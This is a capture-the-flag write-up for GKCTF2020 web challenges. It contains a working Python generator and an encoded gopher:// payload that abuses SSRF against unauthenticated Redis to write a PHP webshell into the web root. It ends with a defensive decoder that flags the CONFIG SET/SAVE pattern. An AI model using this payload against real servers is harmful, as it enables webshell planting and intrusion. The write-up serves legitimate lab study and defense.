Table of contents
[GKCTF2020] 老八小超市儿 (getting a shell through the ShopXO admin backend, all versions)
Follow the linked article step by step and you will get the flag.
[GKCTF2020] EZ Three Musketeers - EzWeb (Redis unauthorized access)
1. Information gathering
The challenge source hints at ?secret.
Requesting it returns the target machine's IP address, so probing the internal network is the next step.
2. Scan the /24 range with Burp Suite:
3. Scan ports
Then scan the ports.
Port 6379 is open; 6379 is the default Redis port. After reading the write-up I learned this is a Redis unauthorized-access vulnerability; see the reference article 浅析Redis中SSRF的利用 (A brief analysis of exploiting SSRF against Redis).
4. Generate the payload with a script
I used the exploit script from that article directly,
converted to Python 3:
import urllib.parse
import requests

protocol = "gopher://"
ip = "192.168.163.128"
port = "6379"
shell = "\n\n<?php system(\"cat /flag\") ?>\n\n"
filename = "pass.php"
path = "/var/www/html"
passwd = ""
payload = ''
# Spaces inside the value are swapped for ${IFS} so that split() in redis_format()
# keeps the value as a single token; they are swapped back when encoding.
cmd = ["flushall",
       "set 1 {}".format(shell.replace(" ", "${IFS}")),
       "config set dir {}".format(path),
       "config set dbfilename {}".format(filename),
       "save"
       ]
if passwd:
    cmd.insert(0, "AUTH {}".format(passwd))
# The "_" after the port is the gopher item type character and is not transmitted.
payload = protocol + ip + ":" + port + "/_"


def redis_format(arr):
    # Encode one command as a RESP multi-bulk array: *<argc>\r\n$<len>\r\n<arg>\r\n ...
    CRLF = "\r\n"
    redis = arr.split()
    cmd = ""
    cmd += "*" + str(len(redis))
    for x in redis:
        cmd += CRLF + "$" + str(len((x.replace("${IFS}", " ")))) + CRLF + x.replace("${IFS}", " ")
    cmd += CRLF
    return cmd


if __name__ == "__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))
    print(payload)
Use the resulting payload:
gopher://173.0.41.11:6379/%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2428%0D%0A%3C%3Fphp%20system%28%22cat%20/flag%22%29%20%3F%3E%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%248%0D%0Apass.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A
Then visit the generated pass.php to read the flag.
173.0.41.11/pass.php
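As an added defensive example (not part of the original write-up or the referenced article): a small Python script that decodes a gopher:// Redis payload of the shape generated above, parses the RESP arrays and flags the CONFIG SET dir / dbfilename / SAVE write-to-file pattern, which is what an SSRF egress filter or a Redis-side proxy would alert on. The host and values in the embedded sample are constructed placeholders.

```python
import urllib.parse

# Commands that should not appear in an unauthenticated session originating from a web host.
RISKY = {"flushall", "flushdb", "save", "bgsave", "slaveof", "replicaof", "module", "debug"}

def gopher_selector(url):
    # Bytes a gopher client sends for the URL; assumes the "/_<payload>" convention
    # of the generator above ("_" is the item type character and is not transmitted).
    _host, _, selector = url[len("gopher://"):].partition("/")
    decoded = urllib.parse.unquote(selector)
    return decoded[1:] if decoded.startswith("_") else decoded

def parse_resp(stream):
    # Parse a run of RESP multi-bulk arrays (*argc, then $len / arg pairs) into argv lists.
    cmds, i = [], 0
    while i < len(stream):
        if stream[i] != "*":
            raise ValueError(f"expected array header at offset {i}")
        end = stream.index("\r\n", i)
        argc, i = int(stream[i + 1:end]), end + 2
        args = []
        for _ in range(argc):
            if stream[i] != "$":
                raise ValueError(f"expected bulk string at offset {i}")
            end = stream.index("\r\n", i)
            n, i = int(stream[i + 1:end]), end + 2
            args.append(stream[i:i + n])
            i += n + 2  # skip the argument and its trailing CRLF
        cmds.append(args)
    return cmds

def assess(cmds):
    # Flag risky commands and the dir + dbfilename + SAVE arbitrary-file-write pattern.
    findings, cfg = [], {}
    for args in cmds:
        name = args[0].lower() if args else ""
        if name == "config" and len(args) == 4 and args[1].lower() == "set":
            cfg[args[2].lower()] = args[3]
            findings.append(f"CONFIG SET {args[2].lower()}={args[3]}")
        elif name in RISKY:
            findings.append(name.upper())
    if {"dir", "dbfilename"} <= set(cfg) and {"SAVE", "BGSAVE"} & set(findings):
        findings.append(f"RDB written to {cfg['dir']}/{cfg['dbfilename']}")
    return findings

def analyze_gopher_url(url):
    return assess(parse_resp(gopher_selector(url)))

# Constructed sample with the write-up's command sequence (placeholder host, no shell content).
SAMPLE_URL = "gopher://10.0.0.1:6379/_" + urllib.parse.quote(
    "*1\r\n$8\r\nflushall\r\n*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$3\r\ndir\r\n$13\r\n/var/www/html\r\n"
    "*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$10\r\ndbfilename\r\n$8\r\npass.php\r\n*1\r\n$4\r\nsave\r\n")
```

On the Redis side the same pattern is blocked by `rename-command CONFIG ""` plus `requirepass` and `protected-mode yes`; on the web side, refusing the gopher:// scheme in outbound URL fetches removes the vector entirely.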